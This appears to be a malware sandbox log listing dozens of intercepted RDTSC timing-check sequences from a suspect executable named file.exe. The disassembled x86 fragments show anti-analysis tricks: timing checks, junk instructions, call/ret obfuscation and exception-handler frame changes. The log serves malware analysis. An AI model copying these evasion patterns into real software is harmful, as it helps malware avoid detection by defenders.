Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F90FD7 second address: F90FF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F90FF3 second address: F90FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9185F second address: F91865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9262D second address: F92664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323676h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB1DD32366Ch 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jng 00007FB1DD323666h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91865 second address: F91869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92664 second address: F92668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92374 second address: F92379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92668 second address: F9266C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92379 second address: F92390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB1DCC289D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f je 00007FB1DCC289DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F954FA second address: F95502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9ABF2 second address: F9ABF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9ABF6 second address: F9AC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b mov dword ptr [ebp+122D377Ah], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FB1DD323668h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007FB1DD32366Bh 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FB1DD323668h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e pushad 0x0000004f add ecx, 1A94B55Dh 0x00000055 mov edx, dword ptr [ebp+122D1E3Eh] 0x0000005b popad 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push ebx 0x00000061 pop ebx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9AC66 second address: F9AC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97D45 second address: F97DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD32366Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d and edi, 32A2AFC4h 0x00000013 pop ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FB1DD323668h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 cmc 0x00000036 and edi, dword ptr [ebp+122D2B39h] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007FB1DD323668h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 00000015h 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d mov edi, dword ptr [ebp+122D21FAh] 0x00000063 mov eax, dword ptr [ebp+122D1189h] 0x00000069 xor dword ptr [ebp+122D2F5Bh], ebx 0x0000006f push FFFFFFFFh 0x00000071 mov ebx, ecx 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 jmp 00007FB1DD32366Eh 0x0000007c jbe 00007FB1DD323666h 0x00000082 popad 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9AD99 second address: F9ADB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97DE8 second address: F97DFD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB1DD32366Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9BD9B second address: F9BD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CCED second address: F9CD8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FB1DD323668h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D265Bh], ecx 0x0000002a movsx ebx, si 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FB1DD323668h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov ebx, dword ptr [ebp+122D1D88h] 0x0000004f push 00000000h 0x00000051 call 00007FB1DD323676h 0x00000056 mov dword ptr [ebp+12451933h], edx 0x0000005c pop ebx 0x0000005d xchg eax, esi 0x0000005e push edx 0x0000005f push edi 0x00000060 jns 00007FB1DD323666h 0x00000066 pop edi 0x00000067 pop edx 0x00000068 push eax 0x00000069 pushad 0x0000006a jmp 00007FB1DD32366Fh 0x0000006f push eax 0x00000070 push edx 0x00000071 je 00007FB1DD323666h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9BD9F second address: F9BDAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB1DCC289DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9EC28 second address: F9EC41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9EC41 second address: F9ECE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FB1DCC289D8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D2F6Fh] 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c jmp 00007FB1DCC289DEh 0x00000031 add ebx, dword ptr [ebp+124562A0h] 0x00000037 popad 0x00000038 sub dword ptr [ebp+122D3736h], edi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ecx 0x00000043 call 00007FB1DCC289D8h 0x00000048 pop ecx 0x00000049 mov dword ptr [esp+04h], ecx 0x0000004d add dword ptr [esp+04h], 0000001Dh 0x00000055 inc ecx 0x00000056 push ecx 0x00000057 ret 0x00000058 pop ecx 0x00000059 ret 0x0000005a jmp 00007FB1DCC289E7h 0x0000005f push eax 0x00000060 pushad 0x00000061 jc 00007FB1DCC289DCh 0x00000067 je 00007FB1DCC289D6h 0x0000006d pushad 0x0000006e pushad 0x0000006f popad 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9FD1D second address: F9FD23 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9FD23 second address: F9FD2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA0D24 second address: FA0D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1B8C second address: FA1B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1B90 second address: FA1BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jnp 00007FB1DD323669h 0x00000010 mov ebx, 3FA4B40Fh 0x00000015 push 00000000h 0x00000017 sub edi, 48B96024h 0x0000001d push 00000000h 0x0000001f mov bl, dl 0x00000021 push eax 0x00000022 je 00007FB1DD323680h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA2AD4 second address: FA2B6D instructions: 0x00000000 rdtsc 0x00000002 je 00007FB1DCC289E5h 0x00000008 jmp 00007FB1DCC289DFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FB1DCC289D8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c add dword ptr [ebp+12455636h], ebx 0x00000032 movsx ebx, ax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FB1DCC289D8h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 pushad 0x00000052 mov ecx, 2B1DF111h 0x00000057 mov ecx, dword ptr [ebp+122D2B3Dh] 0x0000005d popad 0x0000005e push 00000000h 0x00000060 or edi, dword ptr [ebp+122D1F14h] 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jng 00007FB1DCC289ECh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9FF1F second address: F9FF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9FF28 second address: F9FFB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FB1DCC289D8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1CABh], eax 0x00000028 jnp 00007FB1DCC289E2h 0x0000002e js 00007FB1DCC289DCh 0x00000034 jnc 00007FB1DCC289D6h 0x0000003a push dword ptr fs:[00000000h] 0x00000041 mov dword ptr [ebp+122D1C89h], edx 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e jp 00007FB1DCC289D6h 0x00000054 mov eax, dword ptr [ebp+122D0631h] 0x0000005a push 00000000h 0x0000005c push ebp 0x0000005d call 00007FB1DCC289D8h 0x00000062 pop ebp 0x00000063 mov dword ptr [esp+04h], ebp 0x00000067 add dword ptr [esp+04h], 00000015h 0x0000006f inc ebp 0x00000070 push ebp 0x00000071 ret 0x00000072 pop ebp 0x00000073 ret 0x00000074 push FFFFFFFFh 0x00000076 adc bx, A1C2h 0x0000007b nop 0x0000007c pushad 0x0000007d push ecx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA2D1C second address: FA2DB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FB1DD323666h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FB1DD32366Ah 0x00000013 nop 0x00000014 jnl 00007FB1DD32366Ch 0x0000001a add edi, 0FD6F095h 0x00000020 push dword ptr fs:[00000000h] 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007FB1DD323668h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 mov di, 8524h 0x00000045 mov ebx, dword ptr [ebp+1245193Ah] 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 mov eax, dword ptr [ebp+122D0861h] 0x00000058 mov ebx, dword ptr [ebp+122D2B65h] 0x0000005e push FFFFFFFFh 0x00000060 push 00000000h 0x00000062 push edi 0x00000063 call 00007FB1DD323668h 0x00000068 pop edi 0x00000069 mov dword ptr [esp+04h], edi 0x0000006d add dword ptr [esp+04h], 00000017h 0x00000075 inc edi 0x00000076 push edi 0x00000077 ret 0x00000078 pop edi 0x00000079 ret 0x0000007a push eax 0x0000007b jbe 00007FB1DD323678h 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA2DB4 second address: FA2DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA49E5 second address: FA49EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA49EB second address: FA49EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3C5A second address: FA3C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF244 second address: FAF248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF248 second address: FAF273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DD323671h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB1DD323674h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB210E second address: FB2112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F54CA9 second address: F54CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F54CAD second address: F54CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB1DCC289DDh 0x0000000d jbe 00007FB1DCC289D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F54CC8 second address: F54CD2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB1DD323666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9145 second address: FB914E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB914E second address: FB9152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB3FA second address: FBB400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB400 second address: FBB406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB406 second address: FBB444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E6h 0x00000007 push eax 0x00000008 jnc 00007FB1DCC289D6h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007FB1DCC289E8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF99B second address: FBF9A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB1DD32366Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFB10 second address: FBFB1F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB1DCC289D8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFEE6 second address: FBFEFA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB1DD32366Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFEFA second address: FBFF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFF00 second address: FBFF0E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB1DD323666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFF0E second address: FBFF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFF12 second address: FBFF18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFF18 second address: FBFF24 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB1DCC289DEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC005D second address: FC0061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0061 second address: FC0065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC59B4 second address: FC59C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC59C3 second address: FC59C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC59C9 second address: FC59DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FB1DD323666h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FC97 second address: F4FCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DCC289E3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FCAE second address: F4FCC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB1DD323670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FCC8 second address: F4FCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FCCC second address: F4FCD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FCD0 second address: F4FCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4989 second address: FC498F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC498F second address: FC4993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4993 second address: FC49DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB1DD323666h 0x00000009 jns 00007FB1DD323666h 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FB1DD323672h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FB1DD323673h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a jc 00007FB1DD323666h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC49DE second address: FC49F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC49F6 second address: FC49FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4CBB second address: FC4CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4CBF second address: FC4CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DD32366Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4CD3 second address: FC4CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB1DCC289E4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4CEC second address: FC4CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4CF4 second address: FC4D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DCC289E1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4D0B second address: FC4D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
